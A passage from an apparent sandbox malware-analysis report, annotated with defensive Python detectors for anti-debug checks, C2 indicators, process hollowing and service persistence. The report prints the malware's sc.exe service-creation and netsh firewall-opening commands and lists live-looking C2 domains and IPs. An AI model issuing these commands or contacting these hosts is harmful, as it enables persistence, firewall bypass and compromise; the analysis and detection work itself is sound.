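            # 64 8B /r disp32 (mod=00, rm=101)   mov r32, fs:[30h]
            if (code[i + 1:i + 2] == b"\x8B" and i + 7 <= n
                    and (code[i + 2] & 0xC7) == 0x05 and code[i + 3:i + 7] == FS30):
                yield i, 7, REG[(code[i + 2] >> 3) & 7]
                i += 7
                continue
            # 64 FF 35 30 00 00 00 ; 58+r   push dword ptr fs:[30h] ; pop r32
            if (code[i + 1:i + 3] == b"\xFF\x35" and code[i + 3:i + 7] == FS30
                    and i + 7 < n and 0x58 <= code[i + 7] <= 0x5F):
                yield i, 8, REG[code[i + 7] - 0x58]
                i += 8
                continue
        i += 1


def peb_field_after(code, start, reg, window=12):
    """First [reg+disp8] access within `window` bytes of `start`: (offset, field) or None."""
    r = REG.index(reg)
    for j in range(start, min(start + window, len(code) - 1)):
        # modrm with mod=01 (disp8) and rm=reg, preceded by an accepted opcode
        if code[j] in FIELD_OPCODES and (code[j + 1] & 0xC7) == (0x40 | r) and j + 2 < len(code):
            disp = code[j + 2]
            return j, PEB_FIELDS.get(disp, f"PEB+0x{disp:02x}")
    return None


def scan(code):
    """Return [(load_offset, register, field_or_None)] for every PEB load in the blob."""
    out = []
    for off, width, reg in find_peb_loads(code):
        hit = peb_field_after(code, off + width, reg)
        out.append((off, reg, hit[1] if hit else None))
    return out


# Constructed test blob (not sample bytes): three classic checks back to back.
SAMPLE_CODE = bytes.fromhex(
    "64A130000000" "0FB64002" "85C0" "7502"          # mov eax,fs:[30h]; movzx eax,byte [eax+2]; test eax,eax; jnz
    "648B0D30000000" "8B4168" "83E070"               # mov ecx,fs:[30h]; mov eax,[ecx+68h]; and eax,70h
    "64FF3530000000" "5B" "8B4364" "83F802" "7C00"   # push fs:[30h]; pop ebx; mov eax,[ebx+64h]; cmp eax,2; jl
)

if __name__ == "__main__":
    for off, reg, field in scan(SAMPLE_CODE):
        print(f"{off:#06x}: PEB -> {reg}, reads {field}")
```

The same byte patterns are what a YARA rule for this behaviour would carry (`64 A1 30 00 00 00`, `64 8B ?? 30 00 00 00`, `64 FF 35 30 00 00 00`); the scanner adds the follow-up field so a hit can be labelled as a debugger check rather than, say, a legitimate heap lookup through PEB.ProcessHeap.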

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 40.93.207.0 25
Source: C:\Windows\explorer.exe | Domain query: patmushta.info
Source: C:\Windows\explorer.exe | Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe | Network Connect: 188.166.28.199 80
Source: C:\Windows\explorer.exe | Domain query: unicupload.top
Source: C:\Windows\explorer.exe | Network Connect: 185.233.81.115 187
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 185.188.183.61 443
Source: C:\Windows\explorer.exe | Network Connect: 185.7.214.171 144
Source: C:\Windows\explorer.exe | Domain query: host-data-coin-11.com
Source: C:\Windows\SysWOW64\svchost.exe | Domain query: microsoft-com.mail.protection.outlook.com
Source: C:\Windows\explorer.exe | Domain query: goo.su
Source: C:\Windows\explorer.exe | Domain query: transfer.sh
Source: C:\Windows\explorer.exe | Domain query: a0621298.xsph.ru
Source: C:\Windows\explorer.exe | Network Connect: 185.186.142.166 80
Source: C:\Windows\explorer.exe | Domain query: data-host-coin-8.com
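The lines above list every outbound connection and DNS query the sandbox attributes to explorer.exe and to the svchost.exe that gecrjwsv.exe injected into. The Python below is an added example, not part of the report: it turns such lines into a per-image IOC set and flags the two things a responder blocks on first, system images initiating traffic at all, and connections to non-standard ports such as 187 and 144. The sample lines are copied from this section; the set of "expected" ports and the list of system images are assumptions of the example.

```python
import re
from collections import defaultdict

# Constructed input: lines copied from the "System process connects to network" entries above.
NET_SAMPLE = r"""
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 40.93.207.0 25
Source: C:\Windows\explorer.exe | Domain query: patmushta.info
Source: C:\Windows\explorer.exe | Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe | Network Connect: 188.166.28.199 80
Source: C:\Windows\explorer.exe | Network Connect: 185.233.81.115 187
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 185.188.183.61 443
Source: C:\Windows\explorer.exe | Network Connect: 185.7.214.171 144
Source: C:\Windows\SysWOW64\svchost.exe | Domain query: microsoft-com.mail.protection.outlook.com
Source: C:\Windows\explorer.exe | Domain query: transfer.sh
"""

NET_RE = re.compile(
    r"^Source:\s*(?P<proc>.+?)\s*\|\s*"
    r"(?:Network Connect:\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d+)"
    r"|Domain query:\s*(?P<domain>\S+))"
)
# Images that should never originate their own sessions (assumed policy for the example).
SYSTEM_IMAGES = {"explorer.exe", "svchost.exe"}
# Ports conventional for the traffic in this report; anything else is flagged (assumed).
EXPECTED_PORTS = {80, 443, 25}


def image_of(path):
    return path.replace("/", "\\").split("\\")[-1].lower()


def extract_iocs(text):
    """Return {image: {"ips": {(ip, port), ...}, "domains": {...}}} from report lines."""
    out = defaultdict(lambda: {"ips": set(), "domains": set()})
    for raw in text.splitlines():
        m = NET_RE.match(raw.strip())
        if not m:
            continue
        image = image_of(m.group("proc"))
        if m.group("ip"):
            out[image]["ips"].add((m.group("ip"), int(m.group("port"))))
        else:
            out[image]["domains"].add(m.group("domain").lower())
    return dict(out)


def findings(iocs):
    """Human-readable findings, stable order, for the IOC set."""
    notes = []
    for image, data in sorted(iocs.items()):
        if image in SYSTEM_IMAGES and (data["ips"] or data["domains"]):
            notes.append(f"{image}: system process initiated network activity")
        for ip, port in sorted(data["ips"]):
            if port not in EXPECTED_PORTS:
                notes.append(f"{image}: {ip}:{port} on non-standard port")
    return notes


def flat_indicators(iocs):
    """Deduplicated domain and IP list suitable for a block list (ports dropped)."""
    domains = {d for data in iocs.values() for d in data["domains"]}
    ips = {ip for data in iocs.values() for ip, _ in data["ips"]}
    return sorted(domains) + sorted(ips)


if __name__ == "__main__":
    iocs = extract_iocs(NET_SAMPLE)
    print("\n".join(findings(iocs)))
    print(flat_indicators(iocs))
```

Note that microsoft-com.mail.protection.outlook.com is a mail exchanger, not a C2; together with the port 25 connection from svchost.exe it is the spam-sending leg of the activity and belongs in the findings, not in a block list of attacker infrastructure.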
Benign windows process drops PE files
Source: C:\Windows\explorer.exe | File created: 6FB4.exe.5.dr
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\tijXCZsbGe.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\Desktop\tijXCZsbGe.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Source: C:\Users\user\AppData\Roaming\rifsswe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Roaming\rifsswe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe | Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 5D0000 protect: page execute and read and write
Injects a PE file into a foreign process
Source: C:\Users\user\AppData\Roaming\rifsswe | Memory written: C:\Users\user\AppData\Roaming\rifsswe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\F65C.exe | Memory written: C:\Users\user\AppData\Local\Temp\F65C.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 5D0000 value starts with: 4D5A
Contains functionality to inject code into remote processes
Source: C:\Users\user\AppData\Roaming\rifsswe | Code function: 9_2_00630110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\Desktop\tijXCZsbGe.exe | Thread created: C:\Windows\explorer.exe EIP: 4DF1930
Source: C:\Users\user\AppData\Roaming\rifsswe | Thread created: unknown EIP: 4F11930
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 5D0000
Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 79A008
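The API chain the report attributes to rifsswe at 9_2_00630110 is the textbook process-hollowing sequence: spawn a copy of itself (GetModuleFileNameA then CreateProcessA), read its thread context, unmap the original image with NtUnmapViewOfSection, allocate and write a new PE into it, patch the context and resume. The "Memory written ... base: 400000 value starts with: 4D5A" entries are the other half of the same picture, an MZ header landing at a foreign image base. The Python below is an added example, not code from the sample or the sandbox: it matches an API trace against that stage sequence, and it tightens the "starts with 4D5A" check into a PE-header test that also validates e_lfanew. The stage alternatives beyond the APIs on the page (W variants, Nt/Zw names) and the benign trace are the example author's additions.

```python
import re
import struct

# One API set per hollowing stage plus a label; a trace matches when it hits
# every stage in order, with any other calls interleaved.
HOLLOWING_STAGES = [
    ({"CreateProcessA", "CreateProcessW"}, "spawn host (suspended)"),
    ({"GetThreadContext", "Wow64GetThreadContext"}, "read host thread context"),
    ({"NtUnmapViewOfSection", "ZwUnmapViewOfSection"}, "unmap host image"),
    ({"VirtualAllocEx", "NtAllocateVirtualMemory"}, "allocate payload region"),
    ({"WriteProcessMemory", "NtWriteVirtualMemory"}, "write payload"),
    ({"SetThreadContext", "Wow64SetThreadContext"}, "redirect entry point"),
    ({"ResumeThread", "NtResumeThread"}, "resume host"),
]


def parse_code_function(line):
    """Extract the API list from a report line ending in 'Code function: <id> a,b,c,'."""
    m = re.search(r"Code function:\s*\S+\s+(.*?),?\s*$", line)
    return [x.strip() for x in m.group(1).split(",") if x.strip()] if m else []


def match_hollowing(trace):
    """Return the APIs that satisfied each stage, in order, or None if any stage is missing."""
    matched, stage = [], 0
    for api in trace:
        if stage < len(HOLLOWING_STAGES) and api in HOLLOWING_STAGES[stage][0]:
            matched.append(api)
            stage += 1
    return matched if stage == len(HOLLOWING_STAGES) else None


def looks_like_pe(data):
    """Tightened form of 'value starts with: 4D5A': MZ magic, e_lfanew (offset 0x3C)
    pointing inside the buffer, and the 4-byte PE signature at that offset."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def fake_pe_image():
    """Constructed 0x48-byte stand-in for an injected image; not bytes from the sample."""
    buf = bytearray(0x48)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)
    buf[0x40:0x44] = b"PE\0\0"
    return bytes(buf)


# The rifsswe chain exactly as listed on this page, and a constructed benign launcher
# trace (create a child, wait for it, clean up) that must not match.
RIFSSWE_LINE = ("Source: C:\\Users\\user\\AppData\\Roaming\\rifsswe | Code function: 9_2_00630110 "
                "VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,"
                "GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,"
                "NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,"
                "ResumeThread,ExitProcess,")
BENIGN_TRACE = ["CreateProcessA", "WaitForSingleObject", "GetExitCodeProcess", "CloseHandle"]

if __name__ == "__main__":
    print(match_hollowing(parse_code_function(RIFSSWE_LINE)))
    print(match_hollowing(BENIGN_TRACE))
    print(looks_like_pe(fake_pe_image()))
```

Because the hollowed child is a copy of the parent (same path, as the rifsswe and F65C.exe entries show), any "foreign process" rule keyed on image name misses this case; key it on process id, or on the write landing at the child's own image base, as the sandbox does.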
.NET source code references suspicious native API functions
Source: F65C.exe.5.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: F65C.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 18.0.F65C.exe.ab0000.2.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 18.0.F65C.exe.ab0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 18.0.F65C.exe.ab0000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 18.0.F65C.exe.ab0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 18.0.F65C.exe.ab0000.3.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspic<br>ious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 18.0.F65C.exe.ab0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 18.0.F65C.exe.ab0000.0.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 18.0.F65C.exe.ab0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 35.0.F65C.exe.400000.6.unpack, NativeHelper.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 35.0.F65C.exe.4d0000.13.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 35.0.F65C.exe.4d0000.13.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 35.0.F65C.exe.4d0000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 35.0.F65C.exe.4d0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 35.0.F65C.exe.4d0000.7.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs | Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 35.0.F65C.exe.4d0000.7.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: C:\Users\user\Desktop\tijXCZsbGe.exe | Process created: C:\Users\user\Desktop\tijXCZsbGe.exe "C:\Users\user\Desktop\tijXCZsbGe.exe"
Source: C:\Users\user\AppData\Roaming\rifsswe | Process created: C:\Users\user\AppData\Roaming\rifsswe C:\Users\user\AppData\Roaming\rifsswe
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 7100 -ip 7100
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 264
Source: C:\Users\user\AppData\Local\Temp\E748.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\xzxafeeu\
Source: C:\Users\user\AppData\Local\Temp\E748.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gecrjwsv.exe" C:\Windows\SysWOW64\xzxafeeu\
Source: C:\Users\user\AppData\Local\Temp\E748.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create xzxafeeu binPath= "C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d\"C:\Users\user\AppData\Local\Temp\E748.exe\"" type= own start= auto DisplayName= "wifi support
Source: C:\Users\user\AppData\Local\Temp\E748.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description xzxafeeu "wifi internet conection
Source: C:\Users\user\AppData\Local\Temp\E748.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start xzxafeeu
Source: C:\Users\user\AppData\Local\Temp\E748.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Source: C:\Users\user\AppData\Local\Temp\F65C.exe | Process created: C:\Users\user\AppData\Local\Temp\F65C.exe C:\Users\user\AppData\Local\Temp\F65C.exe
Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
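The sc.exe and netsh.exe command lines above are the persistence and firewall steps of the service-installing component E748.exe: create an auto-start service under a random SysWOW64 subdirectory whose argument points back at the dropper in the user's temp folder, then add an inbound allow rule for SysWOW64\svchost.exe with a name chosen to look like a Windows component. The Python below is an added example, not the sample's or the sandbox's code: it parses the `key= value` syntax of both tools (including the backslash-escaped quotes inside the binPath) and emits findings with ATT&CK ids. The command lines are reconstructed from the entries above with normalised quoting; the parent-process path and the detection rules themselves are the example's assumptions. Note that netsh received `enable=yes>nul` as a literal argument (no shell interpreted the redirection), which the parser preserves rather than silently cleaning up.

```python
import re

# 'key= value' (sc.exe insists on the space) and 'key=value' (netsh). A quoted value
# may contain backslash-escaped quotes, as the sc create line in this report does.
KV_RE = re.compile(r'(\w+)=\s*(?:"((?:\\.|[^"\\])*)"|(\S+))')
SERVICE_NAME_RE = re.compile(r"\bcreate\s+(\S+)", re.I)
USER_TEMP_RE = re.compile(r"\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.I)


def parse_kv(cmdline):
    """Return {lower-cased key: value} for every key=value pair on the command line."""
    return {k.lower(): (q if q else u) for k, q, u in KV_RE.findall(cmdline)}


def image_name(token):
    return token.strip('"').replace("/", "\\").split("\\")[-1].lower()


def analyze(parent_image, cmdline):
    """Findings for one process-creation event as (ATT&CK id, message) tuples."""
    out = []
    tool = image_name(cmdline.split()[0])
    kv = parse_kv(cmdline)
    parent_in_temp = bool(USER_TEMP_RE.search(parent_image))

    m = SERVICE_NAME_RE.search(cmdline)
    if tool == "sc.exe" and m:
        name = m.group(1)
        binpath = kv.get("binpath", "")
        if parent_in_temp:
            out.append(("T1543.003", f"service '{name}' created by a binary in the user temp dir"))
        if USER_TEMP_RE.search(binpath):
            out.append(("T1543.003", f"service '{name}' binPath references a user temp file"))

    if tool == "netsh.exe" and "advfirewall firewall add rule" in cmdline.lower():
        # A fresh allow rule for svchost.exe bypasses the per-service rules Windows ships with.
        if (kv.get("action", "").lower() == "allow" and kv.get("dir", "").lower() == "in"
                and image_name(kv.get("program", "")) == "svchost.exe"):
            out.append(("T1562.004", f"inbound allow rule '{kv.get('name', '')}' for {kv.get('program', '')}"))
    return out


# Reconstructed from the 'Process created' entries above (quoting normalised); the
# parent path is what the report lists as the Source of those entries.
PARENT = r"C:\Users\user\AppData\Local\Temp\E748.exe"
SC_CREATE = (r'"C:\Windows\System32\sc.exe" create xzxafeeu binPath= '
             r'"C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe /d\"C:\Users\user\AppData\Local\Temp\E748.exe\"" '
             r'type= own start= auto DisplayName= "wifi support"')
NETSH_RULE = (r'"C:\Windows\System32\netsh.exe" advfirewall firewall add rule '
              r'name="Host-process for services of Windows" dir=in action=allow '
              r'program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul')
SC_START = r'"C:\Windows\System32\sc.exe" start xzxafeeu'

if __name__ == "__main__":
    for cmd in (SC_CREATE, NETSH_RULE, SC_START):
        print(analyze(PARENT, cmd))
```

The same parser applied to live Sysmon or 4688 events needs the parent image from the event rather than a constant; the rule that fires on a temp-resident parent is the one that separates this activity from an installer legitimately registering a service.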
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
                          Source: C:\Users\user\AppData\Local\Temp\E748.exeCode function: 17_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,
                          Source: explorer.exe, 00000005.00000000.691706298.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.706546747.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.681908870.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
Source: explorer.exe, 00000005.00000000.682065260.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.691924618.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.706731711.0000000001080000.00000002.00020000.sdmp, 9334.exe, 0000000B.00000000.766594639.0000000000D20000.00000002.00020000.sdmp, 9334.exe, 0000000B.00000000.767305300.0000000000D20000.00000002.00020000.sdmp, E748.exe, 00000011.00000002.968917463.0000000000E10000.00000002.00020000.sdmp, 5C89.exe, 00000026.00000002.1003144120.0000000003890000.00000002.00020000.sdmp  Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.683418224.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.682065260.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.691924618.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.706731711.0000000001080000.00000002.00020000.sdmp, 9334.exe, 0000000B.00000000.766594639.0000000000D20000.00000002.00020000.sdmp, 9334.exe, 0000000B.00000000.767305300.0000000000D20000.00000002.00020000.sdmp, E748.exe, 00000011.00000002.968917463.0000000000E10000.00000002.00020000.sdmp, 5C89.exe, 00000026.00000002.1003144120.0000000003890000.00000002.00020000.sdmp  Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.682065260.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.691924618.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.706731711.0000000001080000.00000002.00020000.sdmp, 9334.exe, 0000000B.00000000.766594639.0000000000D20000.00000002.00020000.sdmp, 9334.exe, 0000000B.00000000.767305300.0000000000D20000.00000002.00020000.sdmp, E748.exe, 00000011.00000002.968917463.0000000000E10000.00000002.00020000.sdmp, 5C89.exe, 00000026.00000002.1003144120.0000000003890000.00000002.00020000.sdmp  Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.682065260.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.691924618.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.706731711.0000000001080000.00000002.00020000.sdmp, 9334.exe, 0000000B.00000000.766594639.0000000000D20000.00000002.00020000.sdmp, 9334.exe, 0000000B.00000000.767305300.0000000000D20000.00000002.00020000.sdmp, E748.exe, 00000011.00000002.968917463.0000000000E10000.00000002.00020000.sdmp, 5C89.exe, 00000026.00000002.1003144120.0000000003890000.00000002.00020000.sdmp  Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.713264043.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.686584813.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.702098679.000000000A716000.00000004.00000001.sdmp  Binary or memory string: Shell_TrayWnd5D
Source: C:\Users\user\Desktop\tijXCZsbGe.exe  Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\9334.exe  Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\DB31.exe  Code function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\E748.exe  Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\E748.exe  Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\F65C.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe  Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe  Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\xzxafeeu\gecrjwsv.exe  Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe  Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe  Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe  Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe  Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\F65C.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\F65C.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
